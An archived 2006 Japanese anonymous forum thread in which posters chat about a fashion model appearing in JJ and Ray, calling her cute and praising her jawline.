196 :無名モデル:2006/12/11(月) 05:11:53 ID:l16mSAl0
サッカー好きなの?☆

197 :無名モデル:2006/12/20(水) 16:47:52 ID:HoZbxjej
可愛いからかな?☆

198 :無名モデル:2006/12/21(木) 02:24:37 ID:Kj++zs73
エラ張ってるモデルってなんか魅力的だよね好き。顔の形
特にエラw

199 :無名モデル:2006/12/21(木) 11:48:54 ID:Kj++zs73
でもチャームポイントなんだよね!☆

200 :無名モデル:2006/12/21(木) 12:00:23 ID:u7rphTWZ
可愛くていいとも!!

201 :無名モデル:2006/12/21(木) 14:18:16 ID:Kj++zs73
JJやRayに出てる平松美奈。F女学院の学生です。

彼女について語ってくださいまし。

202 :無名モデル:2006/12/22(金) 13:29:01 ID:Y+Ia3HUV
可愛い…

203 :無名モデル:2006/12/24(日) 11:44:59 ID:fcvHVV9N
セレ部!!

29 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)